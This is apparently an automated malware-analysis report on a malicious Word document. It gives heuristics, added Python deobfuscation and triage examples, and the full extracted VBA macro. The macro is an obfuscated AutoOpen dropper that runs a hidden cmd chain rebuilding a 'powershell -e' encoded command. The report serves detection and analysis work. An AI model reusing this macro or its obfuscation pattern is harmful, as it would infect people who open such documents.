Verdict: MALICIOUS (risk score 310)

Malware Insights

MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File
The sample contains VBA macros that use WScript.Shell to execute a command. The AutoOpen macro concatenates the return values of six helper functions (wbEBOkTwF, zZJzKY, joLbP, PZiIj, lhHCia, BzEQV) together with several undeclared names that evaluate to Empty, and passes the result to WScript.Shell.Run with a window style of 843069887 - 843069887, i.e. 0 (hidden window). Each helper is padded with no-op arithmetic (IsArray, VarType, CDate and similar calls on undeclared names, kept silent by On Error Resume Next) and builds its fragment from '+'-chains of short string literals. The assembled string begins with ChrW(2 + 3 + 9 + 3 + 50), which is 'C', followed by 'Md /v:^on^ ... /r', so once cmd.exe removes the caret escapes the launcher is cmd /v:on /r "...": /v:on enables delayed expansion and /r has the same effect as /c. The quoted inner command is a chain of set statements using delayed-expansion substitution (set Hq=!XH:q=c!, set 43G=!Hq:0=h!, and so on through thirteen single-character replacements) that turns fragments such as '^pow^er(0e^ll^ -^e' into powershell -e, followed by CALL %EH%, which triggers a second expansion pass so that the rebuilt command is what actually runs. The Base64 argument after -e starts as 'J:BE:HI' and becomes 'JABEAHI' once ':' is replaced by 'A' ('JAB' decodes to a UTF-16LE '$', the start of a PowerShell variable, which is what -EncodedCommand expects); the report does not decode the payload further, so the download-and-execute second stage is the analyzer's inference rather than an observed behaviour. Beyond the Visual Basic mapping above, the chain therefore also runs through cmd.exe and PowerShell (ATT&CK T1059.003 and T1059.001). The AutoOpen entry point together with the WScript.Shell.Run call strongly indicates malicious intent.
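The construction chain described above, as an added example that is not part of this report or of the sample: a static deobfuscator that evaluates the macro's string-building assignments with VBA's Empty-is-zero semantics, recovers the WScript.Shell.Run command, strips cmd's caret escapes and replays the set / !var:search=repl! / CALL chain to obtain the final powershell -e command and its UTF-16LE Base64 payload. SAMPLE_VBA is a constructed cut-down macro that reuses the page's idioms (and some of its identifier names); its fragment values and the resulting payload are hypothetical stand-ins, not the sample's. The cmd emulation is a simplification (carets are stripped globally and cmd's percent/caret phase ordering is not modelled) that is sufficient for this pattern.

```python
# Added example (not the analyzer's or the sample's code): static deobfuscator for the
# macro pattern in this report.  SAMPLE_VBA is constructed with the same idioms; its
# fragment values are hypothetical stand-ins, not the sample's payload.
import base64
import re

SAMPLE_VBA = r'''
Function wbEBOkTwF()
On Error Resume Next
iHNMbj = 46446 / wwwpVf
ifOSuz = "M" + "d" + " /" + "v:^on^ " + "/r" + CStr(Chr(EXVUXjiYRToZM + 34 + DALsKFcubF)) + "s^" + "e^T"
wbEBOkTwF = ifOSuz + " ^X^H^" + "=" + "^pow^e" + "r(0e^ll" + "^ -^e" + " ^J^:B^" + "E:H^" + "I^:"
End Function
Function BzEQV()
On Error Resume Next
BzEQV = "& " + "s^e^T ^4^3^G=!^" + "XH^:^0=" + "h!&&S" + "^" + "E^T cK^mC=^" + "!^4^3^G^:" + "^(^=s" + "!&&" + "s^eT " + "Vn=^!^c^K" + "^m^C^:^:^=^A" + "!&" + "C^A^L^l %^Vn% " + CStr(Chr(34)) + " "
End Function
Sub AutoOpen()
On Error Resume Next
CreateObject("WScript.Shell").Run! ChrW(2 + 3 + 9 + 3 + 50) + ztXZmEVS + wbEBOkTwF + BzEQV + zTLkXKmtJwXBoa, 843069887 - 843069887
End Sub
'''

ASSIGN = re.compile(r'^([A-Za-z_]\w*)\s*=\s*(.+)$')
RUN = re.compile(r'\.Run!?\s+(.+)$')                        # .Run! <command>, <window style>
IDENT = re.compile(r'[A-Za-z_]\w*')
STR_LIT = re.compile(r'"([^"]*)"')
CHR = re.compile(r'^(?:CStr\()?ChrW?\((.+?)\)\)?$')         # Chr(..), ChrW(..), CStr(Chr(..))
DELAYED = re.compile(r'!([^!:]+)(?::([^=!]+)=([^!]*))?!')    # !VAR! or !VAR:search=repl!

def vba_number(expr):  # constants plus undeclared names, which are Empty (0) in VBA
    py = IDENT.sub('0', expr)
    if not re.fullmatch(r'[\d\s+\-*/()]+', py):
        raise ValueError('not a numeric expression: ' + expr)
    return int(eval(py.strip()))   # safe: only digits, whitespace and + - * / ( ) remain

def split_plus(expr):  # split on top-level '+' (outside quotes and parentheses)
    parts, cur, depth, in_str = [], '', 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in '()':
            depth += 1 if ch == '(' else -1
        elif not in_str and ch == '+' and depth == 0:
            parts, cur = parts + [cur.strip()], ''
            continue
        cur += ch
    return parts + [cur.strip()]

def eval_term(term, env):  # string value of one '+' operand; None = arithmetic padding
    if m := STR_LIT.fullmatch(term):
        return m.group(1)
    if m := CHR.fullmatch(term):
        return chr(vba_number(m.group(1)))
    if IDENT.fullmatch(term):
        return env.get(term, '')                   # undeclared name -> Empty -> ''
    return None

def extract_run(vba):  # evaluate string assignments in order; return (Run command, style)
    env = {}
    for line in (ln.strip() for ln in vba.splitlines()):
        if m := ASSIGN.match(line):
            parts = [eval_term(t, env) for t in split_plus(m.group(2))]
            if None not in parts:                  # skip the IsArray/VarType/CDate padding
                env[m.group(1)] = ''.join(parts)
        elif m := RUN.search(line):
            cmd_expr, style_expr = m.group(1).rsplit(',', 1)
            cmd = ''.join(eval_term(t, env) or '' for t in split_plus(cmd_expr))
            return cmd, vba_number(style_expr)
    raise ValueError('no WScript.Shell.Run call found')

def emulate_cmd(launcher):
    """Strip ^ escapes, take the /r (same as /c) argument, replay set / !var:a=b! / CALL."""
    flat = re.sub(r'\^(.)', r'\1', launcher)       # simplification: cmd unescapes per phase
    m = re.search(r'/[rc]\s*(.*)$', flat, re.I | re.S)
    if not m or not re.match(r'\s*cmd\b.*/v:on', flat, re.I):
        raise ValueError('expected cmd /v:on /r ...: the chain needs delayed expansion')
    inner, env = m.group(1).strip().strip('"'), {}
    def expand(d):                                 # !VAR! / !VAR:a=b!, evaluated at run time
        val = env.get(d.group(1).upper(), '')
        return val.replace(d.group(2), d.group(3)) if d.group(2) else val
    for part in (p.lstrip() for p in re.split(r'&&|&', inner)):
        if m := re.match(r'set\s+([^=]+)=(.*)$', part, re.I):
            env[m.group(1).strip().upper()] = DELAYED.sub(expand, m.group(2))
        elif m := re.match(r'call\s+%([^%]+)%', part, re.I):  # CALL = second %var% pass
            return env[m.group(1).upper()]
    raise ValueError('no CALL %var% found')

def deobfuscate(vba):
    launcher, style = extract_run(vba)
    final = emulate_cmd(launcher)
    m = re.search(r'-e[a-z]*\s+(\S+)', final, re.I)  # -e / -enc / -EncodedCommand
    b64 = m.group(1) + '=' * (-len(m.group(1)) % 4) if m else ''
    decoded = base64.b64decode(b64).decode('utf-16-le', 'replace') if m else None
    return {'launcher': launcher, 'window_style': style, 'final': final, 'decoded': decoded}

if __name__ == '__main__':
    print(deobfuscate(SAMPLE_VBA))
```

Running it prints a dict whose final entry is the command CALL ends up executing (powershell -e ... for the constructed sample) and whose decoded entry is the UTF-16LE text behind the Base64. Feeding extract_run the full macros.bas shown further down is the natural next step; the real script chains thirteen substitutions through CALL %EH%, and its recovered payload is what the analyzer did not decode.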
Heuristics (10)

- ClamAV: Doc.Malware.Generic-6665581-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.Generic-6665581-0.
- VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings). Document contains VBA macro code.
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched lines in script:

  ```vb
  On Error Resume Next
  CreateObject("WScript.Shell").Run! ChrW(2 + 3 + 9 + 3 + 50) + ztXZmEVS + hzGljvbXiwb + wbEBOkTwF + zZJzKY + joLbP + PZiIj + lhHCia + BzEQV + vSQMiWUrR + zTLkXKmtJwXBoa, 843069887 - 843069887
  End Sub
  ```

- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script: the same CreateObject("WScript.Shell").Run! call shown under the WScript.Shell finding above.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script:

  ```vb
  Sub AutoOpen()
  On Error Resume Next
  ```

- Reference to Windows Script Host (high, SC_STR_WSCRIPT).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample that premise does not hold: a VBA project was recovered (OLE_VBA_MACROS above, macros.bas below), so this marker is redundant with the VBA findings rather than independent evidence.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard Office Open XML DrawingML namespace URI, not a network indicator, and should not be treated as an IOC.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10894 bytes |

SHA-256: 261d68c2f0e16f64063ce6c1d2bc028d55e3409cf8053f1cd401e84a41535a0c

Detection (for macros.bas): ClamAV: No threats found. This does not contradict the Doc.Malware.Generic-6665581-0 hit above, which was produced by scanning the parent document as a whole; the carved VBA source on its own does not match that signature.

Obfuscation or payload: likely. 110 of 176 identifiers look randomly generated (e.g. 'zTLkXKmtJwXBoa'); 1 string-concatenation chain(s), consistent with name-mangling obfuscation.
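The identifier statistic above, as an added example (not the analyzer's implementation, whose rule set is not published on this page): a triage score that flags machine-mangled identifier names by lower-to-upper case flips, long consonant runs and capital density, run over a constructed snippet that mixes real VBA names with names taken from the extracted macro. The thresholds are this example's own assumptions, and the VBA_WORDS stop list is deliberately short.

```python
# Added example (not the analyzer's code; its rule set is not published on this page):
# a triage score flagging machine-mangled identifier names.  Thresholds are this
# example's own assumptions; SNIPPET is constructed from names in the extracted macro.
import re

VBA_WORDS = {  # keywords and library names that must not count as identifiers
    'Attribute', 'VB_Name', 'Sub', 'Function', 'End', 'On', 'Error', 'Resume', 'Next',
    'CreateObject', 'Run', 'IsArray', 'VarType', 'CStr', 'Chr', 'ChrW', 'CDate', 'Sqr',
    'Hex', 'Log', 'Sin', 'Month', 'WScript', 'Shell', 'True', 'False',
}
SNIPPET = r'''
Attribute VB_Name = "oGhNIGEoMzPhc"
Function wbEBOkTwF()
On Error Resume Next
iHNMbj = 46446 / wwwpVf
IsArray Sqr(37376 + IVJHal - 68087 - rCEbsk)
ifOSuz = "M" + "d" + " /" + "v:^on^ "
wbEBOkTwF = ifOSuz
End Function
Sub AutoOpen()
On Error Resume Next
CreateObject("WScript.Shell").Run! ChrW(2 + 3 + 9 + 3 + 50) + wbEBOkTwF, 843069887 - 843069887
End Sub
'''

def identifiers(vba):
    """Distinct identifiers with string literals and VBA keywords removed."""
    code = re.sub(r'"[^"]*"', '', vba)
    return sorted({w for w in re.findall(r'\b[A-Za-z_]\w*\b', code) if w not in VBA_WORDS})

def looks_random(name):
    """Mangled names (zTLkXKmtJwXBoa, iHNMbj) show many lower->upper flips, long consonant
    runs or a majority of capitals; human CamelCase names (AutoOpen, TimeValue) do not."""
    if len(name) < 5 or name.isupper():
        return False
    flips = len(re.findall(r'[a-z][A-Z]', name))
    consonants = max(map(len, re.findall(r'[^aeiouAEIOU_\d]+', name)), default=0)
    caps = sum(c.isupper() for c in name) / len(name)
    return flips >= 3 or consonants >= 5 or caps >= 0.5

def obfuscation_ratio(vba):
    """(flagged count, identifier count, flagged names), the shape of the report's metric."""
    names = identifiers(vba)
    flagged = [n for n in names if looks_random(n)]
    return len(flagged), len(names), flagged

if __name__ == '__main__':
    print(obfuscation_ratio(SNIPPET))
```

A score like this is a triage signal, not a verdict: names such as rCEbsk slip through the three rules, and a stop list that is too short would count library calls as identifiers, so the ratio is only meaningful alongside the WScript.Shell, AutoOpen and concatenation-chain findings above.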
Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "MMYbpnrz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "oGhNIGEoMzPhc"
Function wbEBOkTwF()
On Error Resume Next
iHNMbj = 46446 / wwwpVf
iHNMbj = 93358 / YhVEE - jKFCQ - BthZR
IsArray nhsYw - ArBsfn
ifOSuz = "M" + "d" + " /" + "v:^on^ " + "^ ^ " + "/r" + CStr(Chr(EXVUXjiYRToZM + oJflHUWcJUB + 34 + DALsKFcubF + wEwPJaiCfkbl)) + "s^" + "e^T"
VarType CDate(143449149)
XGdutGirnDA = " " + "^ " + " ^X^H^" + "=" + "^pow^e" + "r(0e^ll" + "^ -^e" + "^" + " ^J^:B^" + "E:H^" + "I^"
VarType CCur(XilZnu / LMbaj)
IsArray YMiWXK / TGspYZ * kUqzwu / zJiAnn
bzDSmnWj = ":^S" + "w^:" + "9:" + "G{^:Z^," + "^B3^:" + "C^" + "#" + ":bwBi^" + ":" + "^G^" + "o^:Z,"
iHNMbj = Hex(lbDzWk - finSh - PjKjG - FrsVQ)
IsArray Sqr(37376 + IVJHal - 68087 - rCEbsk)
IsArray Sin(RZmthz)
IsArray Month(Narlc)
wuBGC = "B^4^:" + "H,^:^I:" + "^" + "B.^:^GU" + "^:d"
iHNMbj = CDate(658)
IsArray CDate(369)
iHNMbj = Month(88)
zDwYTqNUNw = "^:^:/" + "^:^" + "Fq:" + "Z" + "^,Bi:" + "^E;:b^" + ":Bp:G^"
iHNMbj = Atn(75)
IsArray Second(UXVoZC)
iHmVqhAG = "U:^bgB" + "#:D(:" + "^J:^B" + "^" + "L" + ":^" + "H^Y" + "^:,g"
IsArray Log(83727 - 45846)
VarType QHiHhu * FnFlSz / 86839 + FVLSsD
VarType Sqr(tclUXh)
sqzMd = "^" + ":^9^:Cq" + "^:a^:" + "B#^:" + "H^" + ",:q:^:" + "^" + "6:C8" + "^:^L^w"
IsArray 51613 + 49369
IsArray 41833 * Dpopia
VarType Sin(69)
ztzUdYjbYS = "Bk^:" + "Gk:Z^" + "wB" + "^p:^H,^" + ":Y," + "^B(:C{" + "^:^Z,B#" + "^" + ":^G{^:^" + "Y,Bz^" + ":G8:^Z^"
VarType Oct(wUsdSK)
iHNMbj = Atn(61540 - EruNad - 16717 * fwZVYw)
VarType IBmRM / UGchY + RzzZp * dijda
VarType HCXDC * WcOdDT + COqrz - 73025
LiNmOlLjAj = "g^B^#^" + ":C^{^" + ":^Z," + "B^1:C" + "^8:Uw" + "^B:^:"
IsArray Round(32424 / GjujO)
VarType TimeValue(IiiajV)
IsArray 24606 - 10082
fdtArdNdZjl = "Gg^:" + "d:B" + "#^:H::^" + ".^" + "g^:v^:C" + "8^:^q" + "^wBv^" + ":G^;:^a" + "^,^B"
VarType CVar(MzWTnA)
VarType Month(3984)
HFbnRIPhMjZ = "v^:^G" + "^#" + ":Y,B" + "2^:^G" + "^U:^" + "bg^:" + "/^:G;^" + ":bwB^" + "t^:C" + "^" + "8:^d^"
wbEBOkTwF = ifOSuz + XGdutGirnDA + bzDSmnWj + wuBGC + zDwYTqNUNw + iHmVqhAG + sqzMd + ztzUdYjbYS + LiNmOlLjAj + fdtArdNdZjl + HFbnRIPhMjZ
IsArray Atn(45)
iHNMbj = Log(59500 * 52241 - DcKmcC - DqEtWI)
IsArray 21833 / nAPKzj
End Function
Function zZJzKY()
On Error Resume Next
VarType TypeName(FzKzp)
VarType 99994 - 78258
iHNMbj = Atn(mioVj)
VarType CVar(8)
VarType CDbl(ZIHMSJ)
iYbfU = ",^B0:G(" + ":^S" + "^g^:#^:" + "^E:^:^" + "a" + "^:" + "^B^#" + "^:H^" + ",^:q^:" + ":6^:"
VarType CrovPD + 23590
iHNMbj = 30613 - iTEAa * QOOVY * WTqhT
cwFoEaZvHDh = "C^8:" + "L" + "^wBp:H;" + ":bw^B" + "4:" + "^Gk:^Y"
iHNMbj = Second(dfRjJc)
iHNMbj = CDate(YhqwD - SklcrJ + UpoNZ * XpzNQd)
iHNMbj = CDate(87552 - zzKjK)
IsArray Round(JLzKUG)
VarType WYJnJ * IuzBG
acioUa = "^,^B(" + ":G^k^" + ":^d^:" + "B" + "^l:H" + "^" + ";^:^Lg" + "^" + "B4:G8^" + ":b^," + "^:" + "/" + ":G^{"
VarType 54961 + hwzZrm * lwuJf * 58740
VarType Atn(aSijw)
cDAXDMloG = "^:^Z^w:" + "v:^D^;:" + "^a:B;^:" + "H^g^:" + "V^,B^1:" + "G^,^:N" + "wB" + "^:^:"
iHNMbj = 98275 * wQLstc
IsArray TypeName(452)
VarType hMNMdp + XTibo * MhTpu * ilHRZq
IsArray Log(awpTR)
bJKUi = "^G" + "^g" + "^:^d:^" + "B" + "#:" + "^" + "H" + ":" + ":" + ".g:v" + "^" + ":C8" + "^:b^,B"
IsArray 70091 * VwavnV - 8266 + szXoH
iHNMbj = Second(SfjMp)
iHNMbj = 13327 * wVYij - 72184 - 18440
EzvoYzw = "v^" + ":" + "H^Y^:^" + "Z,^Bp:H" + "^;" + ":Z^wBv" + "^:^G" + ",:b^w^" + "B"
zZJzKY = iYbfU + cwFoEaZvHDh + acioUa + cDAXDMloG + bJKUi + EzvoYzw
IsArray 48950 - KisNQj + aGpKL + aJkfRi
iHNMbj = CStr(uHZBi - ZDwYVO)
VarType Xtnzk + EovAY
iHNMbj = TypeName(CvkoZ)
End Function
Function joLbP()
On Error Resume Next
IsArray Cos(5)
iHNMbj = Str(31405 - CsLLzv * 71381 * wvIRSp)
iHNMbj = 40288 + 33998
VarType Hex(2)
VarType Cos(SjEJm)
DViVP = "^p^:" + "C{:^Yw^" + "Bv:^" + "G^#:^L^" + "g^Bi^:" + "^HI^" + ":L^w^" + "B^Z^" + ":H^I^:R"
iHNMbj = CStr(2814)
DzTTT = "^,:^z:D" + "^" + "I^" + ":Vw" + "^BN^" + ":^E^,^:" + "^" + ",:" + "B"
iHNMbj = Sgn(358)
VarType TypeName(633)
IsArray 80382 / Hwbha
wadHL = "^o^:H^" + ",^:^d:^" + "B^w^:" + "^D^o^:L" + "^w" + "^:v^:" + "^G^{:" + "a,B2:G" + "^E:qwBp" + ":" + "C^{^:"
iHNMbj = Val(4)
VarType CByte(53)
kHRjnq = "a^,B/:" + "C^8^:Uw" + ":^`:C" + "{:^Uw" + "B^" + "w:^Gw" + ":^a^,^" + "B^#:" + "Cg^" + ":^" + "Jw^B" + ":^:C" + "q^:^K"
iHNMbj = dObNzo * FCkjHC - FLCrjW / HiBUq
RiEjupYs = ",^:^7" + ":C" + ",:Z" + "^gB3" + ":H^o:^" + "I^:^:"
iHNMbj = CDate(7315)
iiMCLUSszdr = "9:C:^:^" + "Jw:^{^" + ":^D^U:." + ",:^`^" + ":^D(:" + "J:B^I:" + "E{^" + ":q^:" + ":9:C,^" + ":^Z,B/" + ":H"
VarType Sqr(jFwYYv)
iHNMbj = Log(579)
lHITPMr = "Y:^.^gB" + "^w^:" + "H^U:" + "Y^gB(:" + "Gk"
IsArray RmcapZ * VEszi * 6615 / WfatJ
IsArray Sqr(2)
iHNMbj = Str(623)
VarType Round(33403 / ftsYzc)
GwaCl = ":^Yw:r^" + ":Cq" + ":^X^" + ":^" + ":^`:C(" + ":" + "^J:^" + "Bm:H^q^" + ":^eg:r:" + "Cq" + ":LgB"
joLbP = DViVP + DzTTT + wadHL + kHRjnq + RiEjupYs + iiMCLUSszdr + lHITPMr + GwaCl
IsArray iIUGb / 59804 + 31980 * oBftF
IsArray TimeValue(ihRcd)
VarType Val(lOcUA)
iHNMbj = 93605 * swCzuW
End Function
Function PZiIj()
On Error Resume Next
VarType Val(98225 - sddzA * nsAAo - 78027)
SXPjvZbo = "^" + "l:H" + "^g:^Z^," + "^:`" + ":^" + "D" + "(^:" + "Zg" + "Bv^:HI" + "^:^Z,^" + "B0^" + ":" + "G;:^a^:"
IsArray CCur(535)
VarType qMXtN - YAktid
PYWHFroKw = "^:o:C," + ":" + "V^gB^3^" + ":G^g:I" + "^" + ":B" + "p^:G{^:"
IsArray huZcc + chdPIJ - 80212 / FAEEc
iHNMbj = Round(48)
VarType LCase(zoGQt)
GvORZGk = "I" + "^::^k^" + ":E(" + "^:d" + "^gBC:Ck" + "^:^ewB#" + "^:^H"
iHNMbj = oLwCHM * 1850 * 26068 + njRto
iHNMbj = CDate(962)
VarType hDbVp * dvSWF
wzocGwdfHPt = "I^:e,^" + "B^7^:C" + "^,^" + ":" + "R^:^B^" + "$:E(" + "^:L" + "^g^" + "BE" + ":^G8^:^" + "d^w"
IsArray ZUuAtL / zFmcJ
IsArray Rnd(GAMlr - BcnRA)
iHNMbj = mkLHLs * aFuUw / QrEwbb + BPEdNw
DWDsNkSIYG = "B" + "/:^Gw^:" + "bw" + "B0" + "^"
PZiIj = SXPjvZbo + PYWHFroKw + GvORZGk + wzocGwdfHPt + DWDsNkSIYG
iHNMbj = Log(9)
End Function
Function lhHCia()
On Error Resume Next
iHNMbj = CBool(oWfitP)
VarType Sin(24)
IsArray CStr(MHJXrq)
ZTdlqhQI = ":G^" + ",:R^g" + "Bp^" + ":^Gw^" + ":Z^," + ":o^:C" + "^" + ",:V^gB"
VarType 85274 + 84181
IsArray 70477 + lBcEcJ - dUXsM / pqQFX
iHNMbj = Val(830 * ATCTQs)
IsArray 18895 * RjKOzm
GWOCD = "3^:Gg^:" + "^L::g" + "^:" + "C,^" + ":^" + "S:B^.^:" + "H^::K" + "^,:" + "^7" + ":^E^"
iHNMbj = CStr(59257 + rIIft)
iHNMbj = Sqr(szQDt - KKlhi / 73397 - HVMiWn)
VarType Log(rUobX)
VarType qGDiIj / ViZcwI
iHNMbj = 84390 * zmYbRm * rTzuO * snUcvN
boYhTUQV = "k^:^b" + "gB2" + ":^G8" + "^:a^w^" + "B^l:" + "C#:^S" + "^,^B#" + "^:G" + "U^:b^,^" + ":" + "g:C" + "^,^:S^:"
IsArray Second(2384)
IsArray CDec(4009)
IsArray Str(67831 / AzppD)
IsArray 70021 - tEiibp - itzibf / KbthKC
VarType 78399 + tFWvaJ / 12006 / nIzWzK
TjSPiDZHXC = "B.^" + ":H:^:." + "wB^i^:" + "^HI:Z," + "^" + "B0:^G" + "(:^.w" + "B9" + ":" + "^"
IsArray 90172 * YHiFFH + ZFtLZm + uTiIK
iHNMbj = CDec(zoBuz)
jGiKtziiDru = "G;:Y^" + ",^B^" + "#^" + ":G" + ";:"
IsArray LCase(FAzAZ)
iHNMbj = Sin(ChIMH - OdhaT)
VarType CVar(881)
IsArray Int(61670 + BOMRj + 49941 / RrVJdc)
KQZLmjqDSo = "a:B^7^:" + "^H" + "#:" + "^f" + "^" + ",:g:C:" + "^:I" + "::^g:" + "C^:^:^" + "I::g" + "^:C^:"
iHNMbj = TypeName(Rhvhf + GTqJb)
iHNMbj = Rnd(MYpnkf * NtjLrV / 17388 * wfPcs)
IsArray 21136 * pNtqr - wCTMM * 39779
iHNMbj = Int(519)
dlwaYoiwNpF = ":" + "^I^:^:" + "g" + ":" + "C::I^:" + "^:^g^:C"
IsArray IsCzk - ZpBQC
IsArray qVauz / AKjba
iHNMbj = TypeName(30124 / jFTjm)
FQsXbiSPqzr = ":^:I" + "::g^:C^" + "::" + "& " + " s^e^" + "T ^ " + "^H^q=!^" + "XH^:^q=" + "c!&&S"
VarType CVar(77)
IsArray 75143 / pujsui
IsArray Kohuu + GAUGm
iHNMbj = Oct(21)
fnqCJ = "^" + "E^T " + " ^" + "43^G=^" + "!^H^q^:" + "^0^=h" + "!&&"
lhHCia = ZTdlqhQI + GWOCD + boYhTUQV + TjSPiDZHXC + jGiKtziiDru + KQZLmjqDSo + dlwaYoiwNpF + FQsXbiSPqzr + fnqCJ
IsArray CCur(2)
iHNMbj = aViLYX / 24379 + WRmmr + AHYwNu
End Function
Function BzEQV()
On Error Resume Next
iHNMbj = CDbl(517)
bTiIpknZQjF = " s^E" + "t ^ ^" + " " + "^ k^eP" + "Y=^!^4^" + "3^" + "G" + "^"
iHNMbj = Str(WcIYh - mhAsl)
VarType Fix(9079)
AiIYaTZwDTc = ":`" + "^=n^!&&" + " " + " s^e" + "^T ^L" + "^G0=!^k" + "^e" + "^" + "P^Y" + "^:$=^"
iHNMbj = Fix(7)
iHNMbj = Str(iQTDIo)
cCcIfS = "y" + "!&" + "& se" + "^t ^" + " ^" + " ^7M1" + "^S=" + "^!^" + "L^G" + "0^:^4^" + "=^j!& " + " "
iHNMbj = FbhSin - SpBuE
iHNMbj = 79213 / zEqjOk - 29954 * zQjWk
HaTrOa = " " + " S^E^" + "t ^ c^" + "KmC=^!" + "^7M" + "^1^S" + ":(^=s!"
VarType Rnd(MOzbpE * WEVES)
iHNMbj = CStr(azbTD)
mDDhMav = "&s^E^T " + "^" + " " + "^ v^B" + "^6" + "^a=" + "!c^K^" + "mC^"
VarType 82032 * lkKOJ
VarType fqpNiC * RfJcTi / nNJupU - 59728
iHNMbj = 62792 * jfpjuQ + JkfjH + cVLYnp
QPfwcbzO = ":^," + "=^Q" + "^!&&s^" + "Et ^ ^" + " ^ " + "A" + "^" + "j^p=!v^"
IsArray Hex(BlJshD + 24796 + 28734 - OESjD)
vfWaB = "B^6^" + "a:." + "=^O^!&" + "& " + " s"
IsArray Log(52058 * ZdwrDl)
LYjPHGEI = "^eT " + "^ ^ " + "Vn=^!^A" + "^j^" + "p^" + ":" + "^:^=^A" + "!&se^" + "t ^ " + "^ ^Y" + "^a=!V" + "n:^#^=" + "^0"
VarType ncjkfK - XmOJHq
iHNMbj = ztuSzJ / aqYdh
VarType Second(4)
iHNMbj = 10726 * jGwvH
VarType Fix(IWcaJ)
MMvmN = "!&&" + " SE^T" + " NCt=^!" + "^Y^" + "a:^{^" + "=^4" + "^!&& " + " SE" + "^T ^gn" + "0^9=^!N" + "C^t:/" + "^=^u!& " + " s^"
iHNMbj = Second(3212)
IsArray CCur(Ginadv + pMbvsi + LbSPZ / jIrTZ)
VarType BAGUvF - 79299 * FrjEcF - wfuzd
qQQMSGVrX = "e" + "t" + " ^ ^" + " ^EH" + "=^!" + "^gn^" + "0^" + "9^" + ":;^=" + "^M^!" + "&C^" + "A^L^"
VarType uIbGz * 75244
iHNMbj = Oct(KMfoF)
dorLEk = "l %^EH%" + " " + " " + CStr(Chr(UhvLzWYJU + wOHTjMDD + 34 + QZMAuTIt + ZWwkvwQFFL)) + " "
BzEQV = bTiIpknZQjF + AiIYaTZwDTc + cCcIfS + HaTrOa + mDDhMav + QPfwcbzO + vfWaB + LYjPHGEI + MMvmN + qQQMSGVrX + dorLEk
VarType Hex(79)
iHNMbj = CStr(pjGjiK)
End Function
Attribute VB_Name = "VndRBbniaq"
Sub AutoOpen()
On Error Resume Next
CreateObject("WScript.Shell").Run! ChrW(2 + 3 + 9 + 3 + 50) + ztXZmEVS + hzGljvbXiwb + wbEBOkTwF + zZJzKY + joLbP + PZiIj + lhHCia + BzEQV + vSQMiWUrR + zTLkXKmtJwXBoa, 843069887 - 843069887
End Sub